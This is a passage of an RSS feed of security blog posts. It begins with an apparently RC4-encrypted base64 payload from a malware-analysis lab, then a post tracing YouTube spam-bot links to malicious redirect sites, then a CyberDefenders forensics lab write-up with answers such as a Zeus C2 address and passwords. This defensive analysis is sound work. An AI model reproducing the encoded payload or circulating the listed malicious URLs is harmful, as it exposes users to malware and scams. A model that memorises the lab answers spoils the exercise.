K7pIiYC2pGC5foY93mZINrjJcrAgi7jzwUOjNJVDaPq+zvxsOdHIjfNv84P9/sAhDuuZoWh6/JTvVV3EsQ3hs7cXIccLcViw+CZbkPjo1Ikwt7EZpA5yfGdbjIMHaGUAhXkilEQQbIRiaRbHnWiEp/1aRel40hkFoJoRyi7trkSBE+x0Ph1aYQfUmu4U+aNs7LkjRomvKAxpTiqz/pF0XWgM6tN3d23xxx2HhZa2ceMc8i/h1rxXMNg6SSIECD3IOHU+9r/6BB8pGVEsy1ZdpO4q9weqaDZJLhY480CTMey+weDitD1ctqj2V+yUUSU7R2YOmiLNIbB4bS8PDQWWmCf7VHV9IkLqqsPajer3qVy31GHt0XyYlo9vNmZEbe1RJGu6opLXuNS+FOE4OlU3qC012EAqu8qXyjjESDE6CwVmF2H1Xvy8+2G1UYLKWpEUHvInQV+XBVBevWtUKkdYw/yl+C/9F/ZG1/+3l9cg6+4f0KFuDrVNXB6i+JLRbIzGHKJRVMklRBy8oGBGZJlfkALEbVDNUmOf6/oB/1WMSUlZjVjp4lgKy/UYV6/G95OKJPXifhyoASzwJ09NhOPEUCrucOxZwafKx/OFBfX4fgnNmZ/G7bPNc1MzVg598smtm1XyOaIyPerg4fyus7yZf8ywrZLMoVqDe282CtESnnKzD8SVzt09nBhLMiECKeCCOpOCwzvcbyrX0PUhwKGT6W4kDn1Thjfr1iKiYhhPo903Ioer7BZto5ngibOMqxXQVplrL+RND4MYKXFgTesndTXYMWwdS7XWg2r0N5fyt4ZIa6C+NUt5+iWNc8rHdIUvG/uttkc57STE/YosqyENQMykGVIpnZWOentQMQlwjTC4chvnjHZXomSg3vyQau1sW9JODvZ41UNTPudldmGS7NkbFF1x+kL9sF1AZc58kWEvvCKTaYpFGmReb1I4JvOpXOc4VPZyAEeFEpLmTm1Y++KgrbyjPXOG4vYXoboRWJVm3eXiIftqHYjHFwTdfs5qCJK0rTjx3CTpYaNeWnEBCgDPQwvrGZBYVSWxM92zU4MD2jbDT7uEh991SauxASgqrwaemlMktwVeKHm+c3VHhoghDzLKGjVczmYbYdkl1BsLjUpD8q6WvC66iUn/KXNa9gzytM1SaqnkFSavv6PC/hd9gLyQ3sxHj8YrjjCkVd4/SOzqe4B4sxmtmZn/a2T1MB8cpO7P4hXhKeBD9nz/zPmqU9pmGeZYcTjnDee1kNx9JCNHwXS+D/SwOG59My2ptuH2CiA42miWnZSzKyPHi7lkfEI13193R69OndQElm8RDOr0yQ+ieG2XaQcE+98oK7eycBGN9LIfRoGT5kDlBqVWFIUrpgK+5QFoi6XTWkvDlXQ0iX2gpQAnmyBPp3VAVnxG1v+ANrezVWfedUHrb6zU/FfG3Vl3Ckf81waSFdlkFn41Wx6QpPSNmvQIhHnerlSXrG/T1XXSVU8cW55kUexeLEASN9yYv8VhK8PA0Lw0ZFUlaaqyS+kZ6Kq7EMnb+hCCuG88GFA3OK0Q7jWf6ZqAO+dGO7kTFQ8LxZVcC3NSNc/8b+N3zUJ8XkzgYNjYxVcAU2ZqCG+0/DZ38qP8LVcsnVNJjnhucLvf5ECcRTrwrMGjmXngia5ACmtjRe5ste0V/sW4ggeZSzdcBUHBvF+bClUr8HD70Tv/2k7DWJojWbPEcemCdmZ0gu33e1UA9eQ2+VQNLXL87gEK9qcn0VJ9luhpqTprYhjoIOMXsSJQouN8rRlfWmdc1ixuKl/DCaZTiUPYoriGz37oFnZbwLReAYzoJevOA0IlBkqGyxkf15bx5d1CUQd9HPb4/G1TEU+D4oaHGNUsE2yioZ4j67Qgtfug9ocqitA1gpVsfEqR9V6bIk+ZnBV3DhAdUXTKkyDBnyNJzw5nb+uat4TiyZpn2yn4WiR5H7T88vRQBVa+O6iQdX+Rl8v40CUD8aPe4xFAFeSUiQ36NWSvMDQ/1rBwkj8al9KY5E01/iBeM3X4vkpDBU6KU6knSpcTjaSkI6T54IUe+aQugNWZmQp24f68JvRXEhP2qDbSC/Kze9Ft+8s4/XWtZjfSwkKvFvg/TGJshzioLuVKp/VHk3+bV/V5nYrxsyXx6eKICfS4q3kj+dKY9ETPJZ/qFVlnxItJd01fZYK5OgMkQPpTma30OIhpDs4oMeugaHBx5RxLPEieixhwH2TO+f+vcv9UOEGRiM08Ew0nVzpIF9R1klH/EVdDAJdxZ4ildRG/E2Y4awNEQOauRDllijlj8Vl2Y8nnCH2SvgwF1nZMZvgFCgt1AJuu76pWVo/ABFLw/bZ/7Ux1jHWvEBeTMSe6ZejSLo2JNiDC1T569mtIkex0X7ZZdzbzMj9wsrN/Et7gzPCUbZumvA90p9wvKyGqo3khhbyZUe4qWNtPdoTE5jobGzo01GdAGYKUHPE4jMBQiAhGjP9QCaxgp72lFZVzh2nWU8VyM/BGgJkK9vZTk0wxSp0EV1WktGmwIUaVETvzXatkNcYy736T+WPRXdtcOWKmC46MsXhUPxotefUMrjougzZgjJI8X7WXFXwH/9jPDIV8Y1Mh6HNqjIQCmOvmw3l12zrGATUclvCLn9isDJaKjjlx/UYdQYLIZHbFHVRPQ8vuwOwWU/vZIHu7T0WnfnNrBsrB0EjwO+5009mwtgPLNYn9NnpKrOwNqTawZdWz5YJouIWChtU3ht5qnp/Ym10SJyX6D9VHvOgc21rjaQWI+tzdybcGCNfQwlsBjkNTRXP1ec54J2VaND4vXBAWXEQOsHYMtGbI1BqcWKW7duj7rt+LYukyMzgXZ063Sdh7oJJ6MHfgQwpKXJV7u1cIC1xgt9WjllmdteHsnHn/HkgC1dFXZmStlOkTMjAae1a/GEkg/pJd28fdH//rtClx6KX70PN/JZUMRWeID8ZYyoIHXVYiYNNpuZrqkRySUx4IgkCIFfu15rDkWG+7UuNDTvbJX2g+fK2AvRATyVkJVMawnHZJt6ypF0JmQ8UzOYLzvg6KAJX6RKXpMtsKt6pSWo3gwJOPmqo3AfSPu07q9+EyTGzEsK1qAbIsm3icUeRIKJecXi4rBidSeyzx2LWs+7DnvHJa/GpvZsccmaMA6YmeWl0sWwMPOCFxC601nibLz+oG3OlLJCO7vDtJsmES+TKj6LafjqLIBWEVjlcxKZ9BOwbjdq1ZMiynMw+RGs6VqyXegEPjFjbPDCs8xSGFPnp8JnLPXX+YznYmGBGcbsYq50MNyiiLbmzGVxL7pBZmBlq+FI4XQ105UgXBtC+QGRryCqfJWsNwr+beavHoNlPvy4O0G/nAJFVauzPemq5emJd+Lu1bZ/z5k2x5mapdzyLjV6vtTJ4qlER64gZpvangKgs+NWh934esI5FY2/D0LlU83joZ0R8iCwRgmpXRi6pGqpUIc/EuSaEd6tE/1xEbe3g7It4buWni7f3Frr/7CZaDaDtDmlZzcDpYi08Ho4kHLFed1EloTuOb/jfu1teARV7kkzJ9NhvzcXkZKojw4dSRd/PC6/M918Kaskx1ouRTmoHNH6MgrG54dbqNX468CPxbXj04xmcmPSYO2InNmKhDIJGhYAgLlX0PLVg0TWBMHhzzfaArRzbi7w9HvdWi/iqIySIFh2jfjBdex3rLcDvxxgwv4WXc9/wV9h/9FBUk07KzxtTeaG+n6whtuOItsRtTupbsQziP8PAw07ctREl3db7mBfnZN6yas6e4j4AdGX4GinHhYFJ65c10tkJ9zvoQkC86NeBuQHnQDqgC+hzop1+A9tHk24pR2XU5PSyCTPHk8AjoE1dDWU17Mbxc0zICcYZghRW00RKTQbZzW81YgPMANcuSgl+ZCDNZ6ByJ8fFipryESqQrvC5V/owj0vI11q0tNej46B/JiKo7SEFChCfqgYLNELznP6FWed5oYzSqqYJtjDzmeAtfWhG9K7FDKZVhUabKlNzOOuQSJRz5Y209poln7VoVgU/KSoj3eBFF7GkCt8lqQd1CaZNNe4rNx727jFLRX/fBqPtqNsL1ORulxoEGAvhL7o5PP6+Rcg4RAaJnkjJTqRA4S5jGKEzxYk/tr24QxQnWWrV8UJw3DlvqDa6h8GkSlqEIoLsd9vzKYG33MMBpHLJubJeHoQYNF4Maaim3jyPcSryZfnz3gOpnnvVwosu7DB9izHv/6Os4xPuCnRQAHRri5fStdztt2QSRhNBovlx4Lpl9wz9VaaeLmCL/sqyP19PQWR1iOk6GVcHcxHKw7/pdbYD1NKneWN48YpS04vuATK19Q/cU/fQPNz7AGe155i8aHxBW96aW9AKSd3uD1facFs2K8TKd5RijfcEmLFp4PRJ5FLB/DDGXexVInz4FVslnMpeyGf+k5ytQ0SX5bOW4UpeSRS9THxrooyeYzFQXr/pIW4Pi3H3htrrN0BWTRiOFEWctbcvZT+zas6fvGk1Yso8IcmNhzThpWAqy+3b6H5UtXeZNxLEvnoGxe6bvhTXLuyrS6EiKtHiZ+RTLRVc/lSDEIJrFN7Hl1ALvMlWWVFDZN42DyUz65B3xtaDge182UFnZ+Wxik2rFY5SW9j3PfzEJEmV4PhagpOyA1YxXnxh7Q7H/p0Uz00m3k9gH/B/7Z1t8XPnAYYfUPj0wWmYwvfz+oXsHOlajXOusxg4f3zfO+rdnRfzK5dZQi/hi0pqcMmI008B6QGAIq2Z3qZaAIgsZIDnaOXsvjnEnVy6kivM9XTL8ETDjTWaS189BrUCSBPz8OtIJLxEzJIPU+kFEptxfQWgvhuELeYrTIfWW3Dc8xt5JzyHyl/BjMbxDfQLg31WVllIPlcjtn3LL8hw144SDEMdloV65ct/e3bKpCAx6zhb+TO24mvcOH2WIsVVxnCKK6fiYMOt7l/IxuqitH3ifVF49TH7kOxrzKp6gcnmfUbffxfWH1I9kfcIfymR0GpBa0lKlEBL0AigjqKdxLNqEsOzQyT8E+xPBg8mJM2yNcrJjTFGHYn6yHqRI7YXAJACU8p/FxK/u85h+uG7UGQSbnJ0AKPlDHCnkn8XOjauiX0AVHSw3R0aGBzpHIjU8b0QpgWE2tRt64FFKrGkk3G9/mp2c06ci1U0cboYcS2fOvbi78MjNhTVse6a3MdYylCxinneoxnV6Y6XsnklVXpZcJmfNRm8xS9OqjYeZjkk02FQ2jentLRbFOCdt0uhDK3lPSUfFGO4TNrnp6o32hy+voiwERW4C0CfHcBcJudOm1onx2K/v57hb+ZrEpnrcKlU2x/ld8KTazBsDn7qr7R56GZr4BRlfIaFOIdwh0vE6vc0bUxHPkQblJSjxKnO8id6SUA/glAwDMKOEj3Qlce4scZtS++eVdFeAe6Fcy9GYS0eyY10IslJlNbjwCFW4zX71Tmw5l0NgiOdeJ6Trhb2PaQ4owHXhXVmffZJnLGHPkhEapk3LifKQKN9MCQeHNpUZjNrFdOWvofimyqS8M6WlqNvH6FxF29MRKZt7VPbRXaBn8uLErquPGERO94NKLjCR5d3lOJsKXIvTUtBpe6h9g0GVLxyfvVcofhUyOoVYSqw2ms/VbfpyB2xrAzFqBKN8R1miQA6pu8FtK1jzORPZDGXXiUcQpLrC33rCQ0RQgxFSffp2/KxYGNU9BhB+fLVZBslnGhe8Zg0HFqVB+luLk0ZIzmsWhnL20X+txRyKoaLaxjy2RWc3usL8G+v3eR3BZOKro8I2otfTw/Fuogzljj15Pci05HREZO+fOQWZi8xY2LjBQCmkXYo51or36cQb9F9LDFbCsKLFFXcdeKf4NXuEO9/kjiBMriTK8Fk0yCQt/T+vtrrierJbojqr+HWvdwjleny9E/PSNGme5qhIcmLUNK95w37zUFdnPHe/WaFTJW489xbEwoeWJdQr+umgA3w3KOK12seT4vpLZy6x6CpPn2GCzQRCBAlv64aQX+gnEqrMjNFNJqeLNtQ+DJTk/Gn/JxEK4wgKxJs4zReOc9lQVbQvcFV2mpMej9u5aiy5z71S46J+wCgm8Kq/rlFQ/zOPqLwPmStpAaFIHAVksUWZohuLTpdPNCG9m5lCjeCAVPvfr4HYwB6Ocm2+Nxj3aaI2Dmgc8V4b/K3/iJ2K8YlYOhqfHxmdcb+X5giJKJzuxGQSvynsfkwmk1qqRr+HL9K6a+gbFKV4c0algxhIm+XrRrd0WV3Qs94ZWpBUY1QjBe/kXcrlwKdnHtN2hp3+v3mYF2MK14G4qXQmkEJGVN79kOZxgG6qfzsCJkLliqf/cnWoKOhS4hGjQZu1KCQ9UiKAckc+00Pb+ocsHsq3UY5HKcRdW3/cENie7awh/YYh1klKvBeBoK/j468uLfF4kAY5EsvPYQFV8UMOGzgS2p2j9v7TW1fhCwOYwfyodOhts322mDXDDQE1rAa5JTwl+pNE869LDstGKJDzbBehyFeKC5O3e7cqW8ACGKtSRV88uCHFet9T908aj7zBn8jDWO3IUEnjQbdRsJsaVMBQ5Veu3LoEK2WLKGpdOM4mcK7K+QKl0x7rlvjBhJ4qRp8noix7+nLWVqTGSsA3ASRj9pT0PtjROj0Z1x1ItIQKJuC5zCWR0HMO5jqaZWUOuMB579WPkpafUcwaUtPf53TKzV33M0/8VyxlZMJL+X7ii3roYf5woywCT9ObIrmfOe+cskW3R+ako29Fn2OWQNmggdBOVMQbJk1i/wl+7aKnRZtd/i4Gl19VKqkdouDtJGgujkyKDjBDZfb1BSIZTwyln2Aq9ahUOqPFuYsFduxNJb0LfYxW9WVT3iKY5qoMYZdpDTtxUgDVllZWtSYl6RF6Cp9Oqtn1bMOICoU7UYWwgZEq4mZcu/wJeOEI293QmfRuK0CGhnRACee+BlxquDanmL4OS8PjXMOIotQvpGTqNqmOGHCUjRhoatQMPet7QRWt6GpDkDolluT9Ux0FmGHeML5/LxaKxF3Eb0X5i5pwWjw1Trf/kZUHvDlXYW82/a7KmTodKWpRuzFOdhbQk5f2qoxoroq6iWeIq+4+SRouq9wTH/HQc9FeW+tw4Wa+xtORUlQLgMN8sv62SWjhJ17JRVMHUMe8IxtY//DFKJo/D9/xcZzrRbADVIRm28kPOOFydco3UxzO70ksTl3RLMzrCKydKrTe71FZls2ERLAvQYBj9cSB7eDWCjNv/6hcJMABENLj02vdgMW5dnsOt9FKh0D7uXulh6flIC2pqVnndt68dqxY0jzkehKRY6XTdd0DRQddXeTFRSArcjEfXjJNqJAyKEkmGyffQJm/7G6Hwion0p9zMzXBz8FZ7XPGP//Ip86I2pCT/jof11XLc9flSD1is1DJ5Y+Wbc4/c2p6RyI+j0uvGKNLr4l9wC0NrKMX8iCKeG5ZylaQW+RcWtngvkMwwUpShoRw3x6h7p/M6AHCJWvFkoARrLDIbrO2x8Iwk6l3lI2X5BNxoP27bfzb5v21CM6nV7J54KHXtlM9W76d91P2LpQ/MjUucFvnxAGvNsL6FCYEEhKa4sjCvDoC7q/sO3YoqNxJNLr/4kXtaV+8MEdSlce8lkhdihsCVuK2afaY1tll2S4BN1ZEgN+wiTmE5kuxCnQjDuialITsNqGj07De3e1FPvKJB+5VGutiVP0KhxKzuoOWRMvoFcGbdkGwiKwh87joobedjLanpVYkJkT330eM4Gyx04BlXtRaGKOBqwhxqS2ZQQ9eBfDqXA4jiEMKIlR5UkvD9VPFjqaXs0qpVmADX2axb30pG+Cz5qofmVoH2Wab6ELv9nl0Kb39hUmL6vJpOpuhqoBV/Lp4o/l8dmrbhue4N84o9YPBy/SFieRfjQP5lsrSZWJKNJ5ZSbf06ZO4=&quot;;<br> return qGxZ;</pre><p>Knowing that I have the key for the RC4, from question 3, and that the string is in base64 I put it all into CyberChef:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XwslgkKb4egzDgOS3fe71A.png" /></figure><p>UspD is the first function in this code.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/475/1*IrHDA8KNFmDcyH2Ttq8NFA.png" /><figcaption>Lab Complete!</figcaption></figure><h4>Conclusion</h4><p>This was a TOUGH one for me. I needed a couple of hints along the way, but I really enjoy malware analysis. I learnt a fair amount and just need more practice to get even better. One of the big things I learnt was about deobfuscating code using olevbs, I did need help with using a small python program. But it felt satisfying to get it done. On to the next one.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=9fbc836d3f6d" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[YouTube’s Spam Comments Plaguing the Platform]]></title>
            <link>https://medium.com/@JawsZero/youtubes-spam-comments-plaguing-the-platform-cf963f818e3a?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/cf963f818e3a</guid>
            <category><![CDATA[youtube-spam-comment]]></category>
            <category><![CDATA[youtube]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Tue, 05 May 2026 16:46:22 GMT</pubDate>
            <atom:updated>2026-05-05T17:02:05.040Z</atom:updated>
            <content:encoded><![CDATA[<h4>This problem is only getting worse.</h4><h4>Introduction</h4><p>The hook? Porn. The end result? Not so sure just yet.</p><p>I am going to be looking in to the rise of YouTube’s porn bot comments, how they operate and whats down the rabbit hole.</p><h4>Not exactly needle in a haystack</h4><p>While watching a recent video personal finance I did something that I shouldn’t and wouldn’t normally do. Read the comment section. Within seconds I saw a top liked comment that had an almost identical one that was a few comments down. At the time I didn’t really think to screenshot it, but I knew I wanted to do a little digging and find out why, how and what these bot accounts were up to.</p><p>Going back to the video today reveals the accounts or at the very least the comments have been removed. So I had to go find some more, after clicking on a bunch of recent high view videos I found what I was after.</p><h4>It makes up most of the internet</h4><p>These comments are rather easy to spot and follow a very basic pattern.</p><ul><li>They have a conventionally attractive women in the profile picture</li><li>They have a high like count, sometimes dwarfing other top comments</li><li>The name on the account is somewhat feminine</li><li>Their profiles, once click, link to another account with a rather…descriptive name.</li><li>They have stolen and altered the text of another top comment.</li></ul><p>I will be blurring out most screenshots for everyone&#39;s sake.</p><h4>The comment</h4><p>Let’s start with this one:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/627/1*a_wBG-gm51vmhw-Q8zapFA.png" /><figcaption>Bot comment</figcaption></figure><p>This comment checks off the above list rather well. In fact, the comment that is has copied and altered in 3 comments below this one.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/643/1*g_vg9pEkZpTOnawctOniJg.png" /><figcaption>Real comment</figcaption></figure><p>If I had to guess, they have used AI to rewrite the comment. The old version of this type of malicious campaign would straight up just copy paste. The bot comment has a few replies, mostly remarking how it is a bot comment.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/681/1*_7QBxThKlp3FmYa2M8QMAg.png" /></figure><p>So the profile itself doesn’t have a link in their bio that leads to a malicious site, however as you can see from the screenshot above it links to another channel. Which…I have blurred because its straight up porn. So the channel seems to be able to skirt any sort of report for the comment they left, since its pretty benign. The report function on the channel also doesn’t really have any categories that match what they are presenting:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/220/1*PsmmognJY28QmW2YWN9rfQ.png" /></figure><p>Going down the list. There is no channel art to report, the profile picture is fine (?) and reporting the user itself leads to the following:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/439/1*TMN_f07G_b_0eeUOT8iF0w.png" /></figure><p>It doesn’t really match any of the issues listed and selecting “None of these are my issue” just leads to a support page.</p><p>Doing a reverse image search on the picture reveals a TON of YouTube accounts doing the exact same thing. All linking to other channels that then proceed to link to malicious websites.</p><h4>Down the rabbit hole</h4><p>Now its time to follow a couple of links using a sandbox’d web browser.</p><p>I found 3 different links that I will be looking into today.</p><pre>rebrand.ly/Renatta-queennnnnn<br>seksswithmee.pse.is/Evangeline-kimmy7<br>anna.is-best.net</pre><p>The first 2 had actually been disabled already by the link shortening services. They seem to be decently quick, but I have found that there are 100s of rebrand.ly links. Which begs the question, how much of their service is just malicious links and are the people creating these links using a free plan, or a premium one that allows you to create way more.</p><p>I found another rebrand link:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*L4vm7-9bLFCSyP6KJgcJKg.png" /></figure><p>Most of these other profiles that are link have rebrand links. Following the link using URLscan I was able to uncover the following:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6VfkWPfaXoGVnZ9OULjDYA.png" /></figure><p>It looks like I was the first one to scan the URL at the top of the image. The main website is completely blank, which is quite common. The usually require a query at the end of the URL, which would track the clicks from a certain source. I couldn’t find too much else about this domain, but finding something new that hasn’t been scanned is quite exciting.</p><p>The 3rd URL is the most interesting to me. It’s a subdomain of a web hosting company (sort of):</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UDhwf4jpyLNLHDAo6gR2tw.png" /></figure><p>A quick search online reveals in reality this website has just cloned a legitimate web hosting company as cover for a malicious redirect website. The domain was first registered back in 2012, but the URL actually has a wayback machine capture from 2003:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*VSbslSZcmIL4rA9PI_7Wzw.png" /></figure><p>Yeah, so it looks like this URL has always been used for malicious purposes, all the links on the page link to even seedier websites. The next captures in 2012 look to be hosting company called Byethost. This trend continues until the last archive on 9th March 2026.</p><p>The URL path redirects a few times:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/848/1*HW2FGg3-nXF8iQV4RczMJw.png" /></figure><p>Looking into the subdomain specifically, it seems to advertise a dating app. Or at least that’s what one of the scans indicated.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NdrJYAIRf9ysaN0LLaqV6g.png" /></figure><p>Depending on where it was scanned from I would get a fake capcha or the above screenshot. Here is the Hybrid Analysis <a href="https://hybrid-analysis.com/sample/774e69a0672180c86ceb6a02c3ad7d479fb722c3aacf43da36a753e069f09dbd">results</a>.</p><h4>What can YouTube do about this?</h4><p>With all the random AI features on the website that no one seems to like, AI generated dubbing for example, they could remove the ability to add links to channel descriptions. Having a feature that only allows only verified links from certain websites to be listed in a separate tab. This wouldn’t stop everything, but one less barrier would help save a lot of people that click.</p><p>This will always be an issue, I don’t ever see it going away. Other websites could also chip in and check links that want to be shortened. ReBrand for example could do a better job at scanning the URL that is being shortened. They have a tool on their website already, but that takes someone like myself to submit their own link for it to be blocked.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=cf963f818e3a" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[l337 S4uc3 Lab]]></title>
            <link>https://medium.com/@JawsZero/l337-s4uc3-lab-a525affa61bb?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/a525affa61bb</guid>
            <category><![CDATA[cyberdefenders-writeup]]></category>
            <category><![CDATA[endpoint-forensics]]></category>
            <category><![CDATA[cyberdefender]]></category>
            <category><![CDATA[digital-forensics]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Mon, 27 Apr 2026 17:49:14 GMT</pubDate>
            <atom:updated>2026-04-27T17:49:14.051Z</atom:updated>
            <content:encoded><![CDATA[<h4>CyberDefenders Endpoint Forensics Lab</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/950/1*pYeFijZkMAtthR2idc-d7Q.png" /></figure><h4>Introduction</h4><p>Everyone has heard of targeted attacks. Detecting these can be challenging, responding to these can be even more challenging. This scenario will test your network and host-based analysis skills as a soc analyst to figure out the who, what, where, when, and how of this incident. There is sure to be something for all skill levels and the only thing you need to solve the challenge is some l337 S4uc3!</p><h4>Question 1</h4><p>PCAP: Development.wse.local is a critical asset for the Wayne and Stark Enterprises, where the company stores new top-secret designs on weapons. Jon Smith has access to the website and we believe it may have been compromised, according to the IDS alert we received earlier today. First, determine the Public IP Address of the webserver?</p><h4>Answer 1</h4><p>I ended up using Network Miner to figure this out. However first I found out that it goes not take the “next-gen” version of pcap files: pcapng. So I opened the file up in Wireshark and just saved it as a Wireshark pcap.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/384/1*SfVCW-xch9qvpJZDXh2N8A.png" /></figure><p>Above is the webserver and its IP address.</p><h4>Question 2</h4><p>PCAP: Alright, now we need you to determine a starting point for the timeline that will be useful in mapping out the incident. Please determine the arrival time of frame 1 in the “GrrCON.pcapng” evidence file.</p><h4>Answer 2</h4><p>Very simple, since the question outlines what you need to do.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/688/1*jTXhCVRUZ_EcNProD47Kng.png" /></figure><p>Just as a note to myself, most of the time the questions look for time answers in UTC.</p><h4>Question 3</h4><p>PCAP: What version number of PHP is the development.wse.local server running?</p><h4>Answer 3</h4><p>Using Network Miner again, I went to the parameters tab and searched for PHP to see what showed up in the logs. I got the following:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/821/1*HjPGetUzeK9YhAKAv6IR3g.png" /></figure><p>PHP version 5.3.2.</p><h4>Question 4</h4><p>PCAP: What version number of Apache is the development.wse.local web server using?</p><h4>Answer 4</h4><p>I did the same steps as question 3.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/817/1*iMfxxrogdUK07A2PqKB9lg.png" /></figure><h4>Question 5</h4><p>IR: What is the common name of the malware reported by the IDS alert provided?</p><h4>Answer 5</h4><p>Looking at the IR.Alert.png, I can see that the threat is under the common name zeus.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/607/1*uuLp6ingW6rcYD6Zg99leQ.png" /></figure><h4>Question 6</h4><p>PCAP: Please identify the Gateway IP address of the LAN because the infrastructure team reported a potential problem with the IDS server that could have corrupted the PCAP</p><h4>Answer 6</h4><p>Looking through Wireshark, I can see there is one main IP address that a lot of resources are being pulled from: 172.16.0.1. Leading me to believe that its the gateaway for development.wse.local.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/643/1*fxR01d0SDFph9CR8-5Z13Q.png" /></figure><h4>Question 7</h4><p>IR: According to the IDS alert, the Zeus bot attempted to ping an external website to verify connectivity. What was the IP address of the website pinged?</p><h4>Answer 7</h4><p>This is a rather simple one, its in the IP Header Information in the alert.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/303/1*MdtyF6Nin4MU0QJcgJDN9w.png" /></figure><h4>Question 8</h4><p>PCAP: It’s critical to the infrastructure team to identify the Zeus Bot CNC server IP address so they can block communication in the firewall as soon as possible. Please provide the IP address?</p><h4>Answer 8</h4><p>My first thought was the above IP address might be the CNC server. However it turns out to just be google.com. I looked through the sessions tab in Network Miner to see if there was any IP address that stood out. The 2 IPs that caught me eye were:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/292/1*QkTsnRxWR2p7f40bnP1AAQ.png" /></figure><p>Wordpress is a funny one, since sometimes threat actors can take over wordpress websites and use them for nefarious deeds. However the other IP address: 88.198.6.20 had HTTP requests that didn’t lead anywhere and additionally also sent requests back to the infected host. Turns out it was 88.198.6.20, which sent requests back which made the most sense to me.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/388/1*GC-yk9gJBa-BVrh78-Fnsw.png" /></figure><p>After answering the question correctly, I looked at the hints to see how they thought you would go about it. They used Brim Security to analyze the pcap file and looked for alerts, which I believe is called zui now. Luckily I already had it installed so I opened the pcap in it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/980/1*AE6oF3vN2Z-_Alp946TytQ.png" /></figure><p>Knowing the infected machines IP address was 172.16.0.109, I searched for it as the destination and looked for a severe alert which also gave me the IP address: 88.198.6.20.</p><h4>Question 9</h4><p>PCAP: The infrastructure team also requests that you identify the filename of the “.bin” configuration file that the Zeus bot downloaded right after the infection. Please provide the file name?</p><h4>Answer 9</h4><p>Network Miner once again giving a very easy way to find this answer, under the files tab and sorting by extension led me to cf.bin.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/535/1*Erwus6sES01tv3k5KYxOhw.png" /></figure><h4>Question 10</h4><p>PCAP: No other users accessed the development.wse.local WordPress site during the timeline of the incident and the reports indicate that an account successfully logged in from the external interface. Please provide the password they used to log in to the WordPress page around 6:59 PM EST?</p><h4>Answer 10</h4><p>The credentials tab reveals all here.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/714/1*SJ4iICKODqvTxBt5zgnLug.png" /></figure><p>The above timestamp matches up with a wordpress session that was carried out by the infected machine.</p><h4>Question 11</h4><p>PCAP: After reporting that the WordPress page was indeed accessed from an external connection, your boss comes to you in a rage over the potential loss of confidential top-secret documents. He calms down enough to admit that the design’s page has a separate access code outside to ensure the security of their information. Before storming off he provided the password to the designs page “1qBeJ2Az” and told you to find a timestamp of the access time or you will be fired. Please provide the time of the accessed Designs page?</p><h4>Answer 11</h4><p>Knowing the credentials is a massive help here, searching for the password string reveals 2 logins. The first is via the 172.16.0.1 gateway which means an external source. Which then provides me with the timestamp.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/925/1*0ag_tzSoERlqwZa16yYVfw.png" /></figure><h4>Question 12</h4><p>PCAP: What is the source port number in the shellcode exploit? Dest Port was 31708 IDS Signature GPL SHELLCODE x86 inc ebx NOOP</p><h4>Answer 12</h4><p>Looking into the pcap file in Wireshark, I searched for destination ports. Both TCP and UDP. The TCP search came up with nothing, but the UDP search came up with the following:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_hx69mG-04CyUK6x0AcRXg.png" /></figure><p>Indicating to me that the source port was: 39709.</p><h4>Question 13</h4><p>PCAP: What was the Linux kernel version returned from the meterpreter sysinfo command run by the attacker?</p><h4>Answer 13</h4><p>To find this I ran a string search for sysinfo in Wireshark. It turned up 2 results and digging into the packet I was able to find the kernel version: 2.6.32–38-server.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_jjqovcJQuXEspcr3iMCzA.png" /></figure><h4>Question 14</h4><p>PCAP: What is the value of the token passed in frame 3897?</p><h4>Answer 14</h4><p>Jumping to the specific packet I can see the following token was passed:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*arZ_2lzmCD63YlcLOI8-eg.png" /><figcaption>b7aad621db97d56771d6316a6d0b71e9</figcaption></figure><h4>Question 15</h4><p>PCAP: What was the tool that was used to download a compressed file from the webserver?</p><h4>Answer 15</h4><p>For this I know I am looking for a GET request. So filtering the requests in the pcap I found a compressed file named: unimportant.tar.gz.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/329/1*0PWJXxrSwtT2jno6rkwPjQ.png" /></figure><p>Then I just looked through the packet to find that wget was used to retrieve the file.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/578/1*sNoOOr5Djih1scx5bI592A.png" /></figure><h4>Question 